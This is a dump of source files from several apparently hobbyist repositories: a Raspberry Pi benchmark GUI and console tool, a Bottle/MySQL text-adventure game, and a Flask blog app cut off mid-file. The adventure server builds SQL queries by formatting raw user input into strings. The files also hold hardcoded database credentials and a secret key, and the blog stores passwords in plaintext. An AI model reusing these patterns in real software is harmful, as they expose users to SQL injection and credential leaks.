stdin=cmd1.stdout, stdout=subprocess.PIPE);\n output = cmd2.stdout.read().decode();\n lst = output.split('CPU die temperature');\n lst2 = lst[1].split('CPU Plimit:');\n lst3 = lst2[0].replace(':', '').replace('\\n', '');\n temp = lst3[1:];\n global body_info_temp_value\n btn_get_tempature.place_forget();\n body_info_temp_value.config(text=temp);\n body_info_temp_value.place(relx=0.21, rely=0.92);\n \n if (os_name == \"Darwin\"):\n global sudo_password;\n if (sudo_password == ''):\n root2 = Toplevel(root)\n root2.title(\"Benchmark v1.0\");\n window__width = 250;\n window_height = 200;\n window_x = root2.winfo_screenwidth() // 2 - (window__width//2);\n window_y = root2.winfo_screenheight() // 2 - (window_height//2);\n root2.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n # root2.overrideredirect(True)\n\n body_title = Label(root2, text='Please enter admin password:', width=window__width, fg='#000', font=\"Arial 15\");\n body_input = Entry(root2, width=50);\n btn_ok = Button(root2, text=\"OK\", width=6, height=1, font=\"Arial 14\")\n\n body_title.place(x=0, y=50, width=window__width, height=20);\n body_input.place(x=15, y=88, width=window__width-30, height=25);\n btn_ok.place(x=70, y=120, width=window__width-140, height=25);\n\n btn_ok.bind(\"<ButtonRelease-1>\", save_password);\n else:\n save_password(0)\n\n elif (os_name == \"Linux\"):\n get_temp = os.popen('vcgencmd measure_temp').readline();\n temp = get_temp.replace(\"temp=\", \"\").replace('\\n', '');\n btn_get_tempature.place_forget();\n body_info_temp_value.config(text=temp);\n body_info_temp_value.place(relx=0.21, rely=0.92);\n elif (os_name == \"Windows\"):\n btn_get_tempature.place_forget();\n body_info_temp_value.place(relx=0.22, rely=0.92);\n\n\ndef 
get_osPlatform():\n os_name = platform.system();\n if (os_name == \"Darwin\"):\n return \"Mac OS\";\n else:\n return os_name;\n\nname_cpu = get_cpu_info()['brand_raw'].replace(' ', '');\nname_os_platform = get_osPlatform();\n\n#user name computer\npc_username = platform.uname()[1]\n\n\n# GUI\nroot = Tk();\nroot.title(\"Benchmark v1.0\");\n# root.iconbitmap('files/pi.ico');\nroot.configure(bg='#fff');\nwindow__width = 550;\nwindow_height = 450;\nwindow_x = root.winfo_screenwidth() // 2 - (window__width//2);\nwindow_y = root.winfo_screenheight() // 2 - (window_height//2);\nroot.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n\n# Menu\nmainmenu = Menu(root);\nroot.config(menu=mainmenu);\n\nactionmenu = Menu(mainmenu, tearoff=0);\nactionmenu.add_command(label=\"Start tests\", command=click_start);\nactionmenu.add_command(label=\"Exit\", command=exit_program);\n\nhelpmenu = Menu(mainmenu, tearoff=0);\nhelpmenu.add_command(label=\"About\", command=about_program);\n\nmainmenu.add_cascade(label=\"Action\", menu=actionmenu)\nmainmenu.add_cascade(label=\"Help\", menu=helpmenu)\n\n\nbody_top = Label(root, text='Benchmark for Raspberry Pi', anchor='w', justify='left', padx=10, height=2, width=window__width, fg='#fff', bg='#053b66', font=\"Arial 15\");\n\nimg_logo = PhotoImage(file='files/logo150.gif');\nbody_logo = Label(root, image=img_logo, bg='#fff');\n\nimg_results = PhotoImage(file='files/other_results.gif');\n\nbtn_start_test = Button(root, text=\"Start Tests\", width=15, height=1, font=\"Arial 15 bold\")\n\nbody_info_os = Label(root, height=1, text='OS', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_os_value = Label(root, height=1, text=name_os_platform, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_user = Label(root, height=1, text='User', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_user_value = Label(root, height=1, text=pc_username, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_proc = Label(root, height=1, text='Processor', anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_proc_value = Label(root, height=1, text=name_cpu, anchor='w', padx=10, font='Arial 15', bg='#fff');\n\nbody_info_temp = Label(root, height=1, text='Tempature', width=window__width, anchor='w', padx=10, font='Arial 15', bg='#fff');\nbody_info_temp_value = Label(root, height=1, text='Not supported', anchor='w', padx=6, font='Arial 15', bg='#fff');\nbtn_get_tempature = Button(root, text=\"Get\", width=6, height=1, font=\"Arial 14\");\n\n# for windows os\nif (name_os_platform == 'Windows'):\n btn_start_test.config(font='Arial 13 bold');\n body_info_os.config(font='Arial 13');\n body_info_os_value.config(font='Arial 13');\n body_info_user.config(font='Arial 13');\n body_info_user_value.config(font='Arial 13');\n body_info_proc.config(font='Arial 13');\n body_info_proc_value.config(font='Arial 13');\n body_info_temp.config(font='Arial 13');\n body_info_temp_value.config(font='Arial 13');\n btn_get_tempature.config(font='Arial 10');\n\n\n#click start\nstart_title = Label(root, text='Loading...', anchor=CENTER, height=2, width=window__width, bg='#fff', fg='#000', font=\"Arial 15\");\nstart_time_left = Label(root, text='5 minutes left', anchor=CENTER, height=1, width=window__width, bg='#fff', fg='#000', font=\"Arial 11\");\nstart_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=350, mode='determinate', value=0)\nstart_logs = Text(width=61, height=5, 
bg=\"#eff0f1\", fg='#333', wrap=WORD)\n\nbody_top.place(x=0, y=0);\nbody_logo.place(width=140, height=140, relx=0.5, rely=0.32, anchor=CENTER);\nbtn_start_test.place(relx=0.5, rely=0.57, anchor=CENTER);\n\nbody_info_os.place(width=110, relx=0, rely=0.71);\nbody_info_os_value.place(relx=0.21, rely=0.71);\n\nbody_info_user.place(width=110, relx=0, rely=0.78);\nbody_info_user_value.place(relx=0.21, rely=0.78);\n\nbody_info_proc.place(width=110, relx=0, rely=0.85);\nbody_info_proc_value.place(relx=0.21, rely=0.85);\n\nbody_info_temp.place(width=110, relx=0, rely=0.92);\n\nbtn_get_tempature.place(relx=0.23, rely=0.92);\n\n\n\n\nbtn_start_test.bind(\"<ButtonRelease-1>\", click_start);\nbtn_get_tempature.bind(\"<ButtonRelease-1>\", get_tempature);\n\n\nroot.mainloop();\n\n\n\n\n\n\n\n\n\n\n"
},
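bench.py above scores each workload the same way: repeat it until a fixed deadline and report the iteration count. A minimal standalone sketch of that timed-counting pattern, mirroring the script's while-loop (the lambda workload is a placeholder):

import time

def count_iterations(workload, run_time=1.0):
    # Run the workload repeatedly until the deadline passes; the raw
    # score is simply how many iterations completed.
    deadline = time.time() + run_time
    count = 0
    while time.time() < deadline:
        workload()
        count += 1
    return count

print(count_iterations(lambda: sum(range(1000))))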
{
"alpha_fraction": 0.8230452537536621,
"alphanum_fraction": 0.8271604776382446,
"avg_line_length": 80,
"blob_id": "9e9948241113e0692e30b9a64362f43d788f0a93",
"content_id": "e2c1d677e8da8098fb4c78c3cff696ea08814444",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 225,
"num_lines": 6,
"path": "/README.md",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "# RaspberryPi-benchmark\n\nBenchmark for testing the performance of the Raspberry Pi against a reference system (Raspberry Pi 3B +) in a standard configuration. The application consists of five tests, each of which in turn takes one minute to complete.\n\nБенчмарк для тестирования производительности Raspberry Pi относительно референсной системы (Raspberry Pi 3B+) в стандартной конфигурации.\nПриложение складается из пяти тестов, из которых каждый в свою очередь выполняется одну минуту.\n"
},
{
"alpha_fraction": 0.46593615412712097,
"alphanum_fraction": 0.5326346158981323,
"avg_line_length": 19.683168411254883,
"blob_id": "751639d9b7de6b07ff6bcd85cd81413299f6a349",
"content_id": "6c40e4f397e17064136f5672313d643c2e3d4bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 101,
"path": "/bench-console.py",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "from decimal import *\nimport time\nimport shutil\nimport zipfile\n\n#config\nRUN_TIME = 60;\n\ndefault_b1 = 626;\ndefault_b2 = 19550516;\ndefault_b3 = 7214769;\ndefault_b4 = 33477349;\ndefault_b5 = 4867;\n\nk_1 = Decimal(1) / Decimal(default_b1);\nk_2 = Decimal(0.3) / Decimal(default_b2);\nk_3 = Decimal(5) / Decimal(default_b3);\nk_4 = Decimal(3) / Decimal(default_b4);\nk_5 = Decimal(0.7) / Decimal(default_b5);\n\nres_1 = 0;\nres_2 = 0;\nres_3 = 0;\nres_4 = 0;\nres_5 = 0;\n\n#1\ndef copy_files():\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n shutil.copyfile(r'files/image.jpg', r'temp/image.jpg');\n if (time.time() >= time_end):\n return count;\n\n#2\ndef find_hash(file):\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n with open(file, 'r') as read_file:\n for line in read_file:\n new_line = line.strip('\\n')\n count += 1;\n if (time.time() >= time_end):\n return count;\n\n#3\ndef test_integer():\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0;\n while True:\n count += 1;\n b += 22226545*22+26216*222+88**88*88;\n if (time.time() >= time_end):\n return count;\n\n#4\ndef test_float():\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0.1;\n while True:\n count += 1;\n b += 0.01;\n if (time.time() >= time_end):\n return count;\n\n#5\ndef create_archive():\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n newzip=zipfile.ZipFile(r'temp/images.zip','w');\n newzip.write(r'files/image.jpg');\n if (time.time() >= time_end):\n return count;\n\n\nr1 = copy_files();\nprint(r1);\nr2 = find_hash('files/PRO_WPA.txt');\nprint(r2);\nr3 = test_integer();\nprint(r3);\nr4 = test_float();\nprint(r4);\nr5 = create_archive();\nprint(r5);\n\ncalc_1 = r1 * k_1;\ncalc_2 = r2 * k_2;\ncalc_3 = r3 * k_3;\ncalc_4 = r4 * k_4;\ncalc_5 = r5 * k_5;\n\nresult = calc_1 + calc_2 + calc_3 + calc_4 + calc_5;\nprint('%.1f' % result)\n\n\n\n\n\n\n\n\n\n\n"
}
] | 3 |
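Both scripts in the repository above normalize raw iteration counts against the reference Raspberry Pi 3B+: each test gets a coefficient k_i = weight_i / reference_i, and the final score is sum(count_i * k_i), so the reference machine scores exactly 1 + 0.3 + 5 + 3 + 0.7 = 10. A compact restatement of that rule, with the reference counts copied from the records above (Decimal("0.3") is used here instead of the scripts' Decimal(0.3) so the coefficients stay exact):

from decimal import Decimal

REFERENCE = [626, 19550516, 7214769, 33477349, 4867]   # default_b1..b5
WEIGHTS = [Decimal("1"), Decimal("0.3"), Decimal("5"),
           Decimal("3"), Decimal("0.7")]

def score(counts):
    # Scale each raw count by weight/reference and sum the five tests.
    return sum(Decimal(c) * w / Decimal(r)
               for c, w, r in zip(counts, WEIGHTS, REFERENCE))

print(score(REFERENCE))  # the reference counts reproduce 10.0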
HaymanLiron/adventure | https://github.com/HaymanLiron/adventure | f8b3e63c1fb5404eaeef2d45e4799e0e1bae9d04 | 05eea8ab966fd676fea9937a5572a671725d0d50 | 6da5a0b243d5d1df5d0c60069b56e1d282f05a03 | refs/heads/master | 2021-06-04T07:43:37.938240 | 2016-08-20T23:19:03 | 2016-08-20T23:19:03 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.469696968793869,
"alphanum_fraction": 0.6969696879386902,
"avg_line_length": 15.5,
"blob_id": "ef4ddccbe29c4fbb0f4a57b0021a2787c8b5e82d",
"content_id": "a43de6e43699446c33604fbdb4a571722775c6a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "bottle==0.12.9\nPyMySQL==0.7.6\nrequests==2.10.0\nvirtualenv==15.0.3\n"
},
{
"alpha_fraction": 0.5549477338790894,
"alphanum_fraction": 0.5643082857131958,
"avg_line_length": 32.434959411621094,
"blob_id": "efecb162e9e1bb79b7400e7e43053a9bab3d458d",
"content_id": "35aee70ee3e87be939e892d21e6a0c05452cf4cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8226,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 246,
"path": "/main.py",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "from bottle import route, run, template, static_file, get, post, request\nimport json\nimport pymysql\nimport os\n\n# Connect to the database\n\n# connection = pymysql.connect(host='us-cdbr-iron-east-04.cleardb.net',\n# user='bf0322fb12a331',\n# password='97028153',\n# db='heroku_19fdd981997ff6d',\n# charset='utf8',\n# cursorclass=pymysql.cursors.DictCursor)\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='adventure-3',\n charset='utf8',\n cursorclass=pymysql.cursors.DictCursor)\n\n\n@route(\"/\", method=\"GET\")\ndef index():\n return template(\"adventure.html\")\n\n\n@route(\"/addUser\", method=\"POST\")\ndef add_user():\n username = request.POST.get(\"username\")\n try:\n with connection.cursor() as cursor:\n sql = \"INSERT INTO `adventure-3`.`user` (`idusers`, `user_name`, `curr_question`, `user_coins`, `user_life`) \" \\\n \"VALUES (NULL, '{0}', '1', '100', '100');\".format(username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return json.dumps({\"question_num\": \"\",\n \"question_text\": \"\",\n \"answers\": [],\n \"image\": \"choice.jpg\"\n })\n\n\ndef user_exists(username):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM user \" \\\n \"WHERE user_name = '{0}'\".format(username)\n cursor.execute(sql)\n result = cursor.fetchone() # returns None if there was no match!\n if result:\n return True\n else:\n return False\n except Exception as e:\n print(\"hello\")\n print(\"you failed because of \" + repr(e))\n return None\n\n\n@route(\"/checkUserCredentials\", method=\"POST\")\ndef check_user_credentials():\n username = request.POST.get(\"username\")\n if user_exists(username):\n return json.dumps({\"already_exists\": 1})\n else:\n return json.dumps({\"already_exists\": 0})\n\n\n@route(\"/start\", method=\"POST\")\ndef start():\n username = request.POST.get(\"username\")\n return json.dumps({\"question_num\": \"\",\n \"question_text\": \"\",\n \"answers\": [],\n \"image\": \"choice.jpg\"\n })\n\n\ndef get_user(username):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM user WHERE user_name = '{0}'\".format(username)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_question_text(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT question_text FROM question WHERE question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_answers_for_question(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT qa.answer_id, answer_text \" \\\n \"FROM q_a_link qa \" \\\n \"LEFT JOIN answer a \" \\\n \"ON qa.answer_id = a.answer_id \" \\\n \"WHERE qa.question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchall()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_question_image(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT image FROM question WHERE question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\n@route(\"/printQuestion\", method=\"POST\")\ndef print_question():\n username = request.POST.get(\"username\")\n\n user = get_user(username)\n # only get next question for user if it exists\n if user[\"curr_question\"] != 
-1:\n question_text = get_question_text(user[\"curr_question\"])\n image_src = get_question_image(user[\"curr_question\"])\n answer_list = get_answers_for_question(user[\"curr_question\"])\n return json.dumps({\"question_text\": question_text[\"question_text\"],\n \"answers\": answer_list,\n \"image\": image_src[\"image\"],\n \"end_reached\": 0,\n \"coins\": user[\"user_coins\"],\n \"life\": user[\"user_life\"]\n })\n else:\n # end has been reached\n user = get_user(username)\n return json.dumps({\"end_reached\": 1,\n \"user\": user})\n\n\ndef get_answer_data(answer_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM answer WHERE answer_id = '{0}'\".format(answer_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef update_user_coins(username, coins_to_deduct):\n user = get_user(username)\n new_coin_amt = max(int(user[\"user_coins\"]) - int(coins_to_deduct), 0)\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET user_coins='{0}' WHERE user_name = '{1}'\".format(new_coin_amt, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_life(username, life_to_deduct):\n user = get_user(username)\n new_life_amt = max(min(int(user[\"user_life\"]) - int(life_to_deduct), 100), 0) # restrict between 0 and 100 percent\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET user_life ='{0}' WHERE user_name = '{1}'\".format(new_life_amt, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_curr_question(username, new_curr_question):\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET curr_question ='{0}' WHERE user_name = '{1}'\".format(new_curr_question, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_data(username, answer_data):\n update_user_coins(username, answer_data[\"answer_coins\"])\n update_user_life(username, answer_data[\"answer_life\"])\n update_user_curr_question(username, answer_data[\"next_question_id\"])\n\n\n@route(\"/handleOptionSelection\", method=\"POST\")\ndef handle_option_selection():\n username = request.POST.get(\"username\")\n answer_id = request.POST.get(\"choice\")\n\n answer_data = get_answer_data(answer_id)\n update_user_data(username, answer_data)\n user = get_user(username)\n return json.dumps({\"user\": user})\n\n\n@route(\"/setDetailsForLoser\", method=\"POST\")\ndef set_details_for_loser():\n username = request.POST.get(\"username\")\n update_user_coins(username, 999) # make it that he loses more coins than he could possibly have\n update_user_life(username, 100)\n update_user_curr_question(username, -1)\n\n\n@route('/js/<filename:re:.*\\.js$>', method='GET')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@route('/css/<filename:re:.*\\.css>', method='GET')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@route('/images/<filename:re:.*\\.(jpg|png|gif|ico)>', method='GET')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n # if os.environ.get('APP_LOCATION') == 'heroku':\n # run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n # else:\n run(host='localhost', port=8080, debug=True)\n add_user()\n\n\nif 
__name__ == '__main__':\n main()\n\n"
},
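main.py above builds every SQL statement with str.format on raw user input, which leaves the app open to SQL injection. A safer sketch of one of its lookups using pymysql's parameter binding (the connection object is assumed to be configured as in the record; this is not part of the original app):

def get_user(connection, username):
    # %s placeholders let the driver escape the value itself;
    # never interpolate user input into SQL with str.format.
    with connection.cursor() as cursor:
        cursor.execute("SELECT * FROM user WHERE user_name = %s", (username,))
        return cursor.fetchone()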
{
"alpha_fraction": 0.5694444179534912,
"alphanum_fraction": 0.5703807473182678,
"avg_line_length": 34.010929107666016,
"blob_id": "d89639b3392073cee20ed0c5a9ad97e6faf25fa8",
"content_id": "89489693fbed482e6e59dbbda047a01a1e7c7cde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6408,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 183,
"path": "/js/adventure.js",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "var Adventures = {};\nAdventures.currentUser = \"\";\n\n//TODO: remove for production\nAdventures.debugMode = true;\nAdventures.DEFAULT_IMG = \"./images/choice.jpg\";\n\n//Setting the relevant image according to the server response\nAdventures.setImage = function (img_name) {\n $(\"#situation-image\").attr(\"src\", \"./images/\" + img_name);\n};\n\nAdventures.printFinalOutcome = function (data) {\n $(\".adventure\").hide();\n $(\".welcome-screen\").hide(); //defensive in case user had logged in after dying\n $(\".final-screen\").show();\n if (data[\"user\"][\"user_coins\"] > 0 && data[\"user\"][\"user_life\"] > 50){\n $(\".final-message\").text(\"Congratulations, you managed to fight off the monster and survive!\");\n } else {\n $(\".final-message\").text(\"You did not succeed in defeating the monster! Bye-bye!\");\n // in case the player died before the final question, set the user details appropriately\n $.ajax(\"/setDetailsForLoser\", {\n type: \"POST\",\n data: {\n \"username\": Adventures.currentUser\n },\n dataType: \"json\",\n contentType: \"application/json\"\n })\n }\n};\n\nAdventures.chooseOption = function () {\n $.ajax(\"/handleOptionSelection\", {\n type: \"POST\",\n data: {\n \"username\": Adventures.currentUser,\n \"choice\": $(this).attr(\"value\")\n }, \n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n $(\".greeting-text\").hide();\n // check if user has life\n if (data[\"user\"][\"user_life\"] <= 0) { // the player died!\n Adventures.printFinalOutcome(data); \n }\n Adventures.getNextQuestion();\n }\n });\n};\n\nAdventures.write = function (message) {\n //Writing new choices and image to screen\n console.log(message);\n $(\".situation-text\").text(message['question_text']).show();\n for (var i = 0; i < message['answers'].length; i++) {\n var opt = $('#option_' + (i + 1));\n opt.text(message['answers'][i]['answer_text']);\n opt.prop(\"value\", message['answers'][i]['answer_id']); \n }\n $(\".coins-and-lives\").text(\"You have \" + message[\"coins\"] + \" coins and \" + message[\"life\"] + \" percentage life!\").show();\n Adventures.setImage(message['image']);\n};\n\nAdventures.getNextQuestion = function () {\n //only gets data for next question, does NOT handle choice selection\n $.ajax(\"/printQuestion\", {\n type: \"POST\",\n data: {\"username\": Adventures.currentUser},\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n if (!(data[\"end_reached\"])){\n $(\".greeting-text\").hide();\n $(\".adventure\").show();\n $(\".welcome-screen\").hide();\n Adventures.write(data);\n } else {\n // we have reached the end!\n Adventures.printFinalOutcome(data);\n }\n }\n });\n};\n\nAdventures.makeNewUser = function () {\n $.ajax(\"/addUser\", {\n type: \"POST\",\n data: {\n \"username\": $(\"#nameField\").val()\n },\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n console.log(\"This worked!\");\n }\n })\n};\n\nAdventures.validateUsernameInput = function () {\n $.ajax(\"/checkUserCredentials\", {\n type: \"POST\",\n data: {\n \"username\": $(\"#nameField\").val()\n },\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n if (data[\"already_exists\"]) {\n // user already exists!\n console.log(\"user exists\");\n Adventures.currentUser = $(\"#nameField\").val();\n Adventures.getNextQuestion();\n } else {\n console.log(\"user does not exist\");\n Adventures.currentUser = $(\"#nameField\").val();\n Adventures.makeNewUser();\n 
Adventures.getNextQuestion();\n }\n }\n });\n};\n\nAdventures.initAdventure = function () {\n //username typed their name in the screen and clicked on the adventure\n var name = $(\"#nameField\").val();\n if (name !== undefined && name !== null && name !== \"\") {\n Adventures.validateUsernameInput();\n }\n};\n\nAdventures.checkName = function () {\n if ($(this).val() !== undefined && $(this).val() !== null && $(this).val() !== \"\") {\n $(\".adventure-option\").prop(\"disabled\", false);\n }\n else {\n $(\".adventure-option\").prop(\"disabled\", true);\n }\n};\n\nAdventures.start = function () {\n $(document).ready(function () {\n $(\".game-option\").click(Adventures.chooseOption); //this sets up the event listener for when a player will click an option which is in response to a question during the adventure\n $(\"#nameField\").keyup(Adventures.checkName); //this validates the player's input for his username when starting the game\n $(\".adventure-option\").click(Adventures.initAdventure); //this sets up a click event listener for when a player selects an adventure at the beginning of the game\n $(\".adventure\").hide();\n $(\".final-screen\").hide();\n $(\".welcome-screen\").show();\n });\n};\n\nAdventures.handleServerError = function (errorThrown) {\n Adventures.debugPrint(\"Server Error: \" + errorThrown);\n var actualError = \"\";\n if (Adventures.debugMode) {\n actualError = \" ( \" + errorThrown + \" ) \";\n }\n Adventures.write(\"Sorry, there seems to be an error on the server. Let's talk later. \" + actualError);\n\n};\n\nAdventures.debugPrint = function (msg) {\n if (Adventures.debugMode) {\n console.log(\"Adventures DEBUG: \" + msg);\n }\n};\n\n//Handle Ajax Error, animation error and speech support\nAdventures.bindErrorHandlers = function () {\n //Handle ajax error, if the server is not found or experienced an error\n $(document).ajaxError(function (event, jqxhr, settings, thrownError) {\n Adventures.handleServerError(thrownError);\n });\n\n //Making sure that we don't receive an animation that does not exist\n $(\"#situation-image\").error(function () {\n Adventures.debugPrint(\"Failed to load img: \" + $(\"#situation-image\").attr(\"src\"));\n Adventures.setImage(Adventures.DEFAULT_IMG);\n });\n};\n\nAdventures.start();\n\n"
}
] | 3 |
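The adventure above is data-driven: each answer row stores answer_coins, answer_life and next_question_id, so advancing the game is just clamping two deltas and following a pointer, with -1 marking the end. A toy in-memory version of that transition — the answer table below is invented; the real rows live in MySQL:

# Hypothetical stand-in for the answer table.
ANSWERS = {
    1: {"coins": 10, "life": 5, "next_question_id": 2},
    2: {"coins": 0, "life": 60, "next_question_id": -1},
}

def apply_answer(user, answer_id):
    a = ANSWERS[answer_id]
    user["coins"] = max(user["coins"] - a["coins"], 0)          # never below 0
    user["life"] = max(min(user["life"] - a["life"], 100), 0)   # clamp to 0..100
    user["curr_question"] = a["next_question_id"]
    return user

print(apply_answer({"coins": 100, "life": 100, "curr_question": 1}, 1))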
skygirlual/blogz | https://github.com/skygirlual/blogz | 5e7816003d89873fb0159bb839d46207f53f2a0c | d93f15b32055afab41a4243d394793494fb966e1 | 54df5097db97d82b1b6aeec5c7b8ead1372d48dc | refs/heads/master | 2021-05-13T14:47:29.450308 | 2018-01-15T07:42:15 | 2018-01-15T07:42:15 | 116,750,349 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5193049907684326,
"avg_line_length": 29.52941131591797,
"blob_id": "13937d12fcf5be8b253fabe0637aa722d1cba574",
"content_id": "d2890939ba7a2e8329ac901560c67d2dbe9845fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 17,
"path": "/templates/newpost.html",
"repo_name": "skygirlual/blogz",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block content %}\n <h1>Create A New Blog Post!</h1>\n <form method='POST'>\n <label>\n New Post Title:<br>\n <input type=\"text\" name='title' value=\"{{title}}\" minlength=1 maxlength=120 />\n <br><br>\n New Post Body:<br>\n <textArea input type=\"text\" name='body' value=\"{{body}}\" minlength=1 maxlength=520 /></textArea>\n </label><br>\n <input type=\"submit\" value='Add Post' />\n </form>\n <hr />\n\n{% endblock %}"
},
{
"alpha_fraction": 0.5935308337211609,
"alphanum_fraction": 0.6008301377296448,
"avg_line_length": 35.390625,
"blob_id": "91829fb2be6d7bf2b8197626e0f874ff5626ce54",
"content_id": "194b5c3808092abe12c3202010d26ea34f4131c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6987,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 192,
"path": "/main.py",
"repo_name": "skygirlual/blogz",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, redirect, render_template, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:password@localhost:3306/blogz'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'T7lX@a$OxTVaC4pkqu'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(510))\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n \n def __init__(self, title, body, owner):\n self.title = title\n self.body = body\n self.owner = owner\n\nclass User(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True)\n password = db.Column(db.String(20))\n blogs = db.relationship('Blog', backref='owner')\n \n def __init__(self, email, password):\n self.email = email\n self.password = password\n\[email protected]_request\ndef require_login():\n allowed_routes = ['register', 'login']\n if request.endpoint not in allowed_routes and 'email' not in session:\n return redirect('/login')\n\[email protected]('/register', methods=['POST', 'GET'])\[email protected]('/signup', methods=['POST', 'GET'])\ndef register():\n if request.method == 'POST':\n email = request.form['email']\n password = request.form['password']\n verify = request.form['verify']\n\n # validation *\n email_error = \"\"\n password_error = \"\"\n verify_error = \"\"\n error_count=0\n\n #email paramaters \n if email == \"\":\n email_error = \"email address not entered \"\n error_count=error_count+1\n\n if \"@\" not in email and len(email) !=0:\n email_error = \"email must contain 1 @ symbol \"\n error_count=error_count+1\n\n if \".\" not in email and len(email) !=0:\n email_error = \"email must contain exactly 1 . symbol \"\n error_count=error_count+1\n\n if \" \" in email and len(email) !=0:\n email_error = \"email must not contain any spaces \"\n error_count=error_count+1\n\n if ((len(email) < 3 or len(email) > 20) and len(email) !=0):\n email_error = \"email must contain 3 to 20 characters \"\n error_count=error_count+1\n\n if len(password) < 3 or len(password) > 20 or \" \" in password:\n password_error = \"Password must contain 3 to 20 characters and no spaces \"\n error_count=error_count+1\n\n if password != verify:\n verify_error = \"Passwords do not match\"\n error_count=error_count+1\n \n login_errors=(email_error, password_error, verify_error)\n if error_count>0:\n for error in login_errors:\n if error != \"\":\n flash(error, 'error')\n return render_template('register.html', email= email, password= password, verify = verify)\n \n # creating new user account.\n existing_user = User.query.filter_by(email=email).first()\n if not existing_user:\n new_user =User(email, password)\n db.session.add(new_user)\n db.session.commit()\n session['email'] 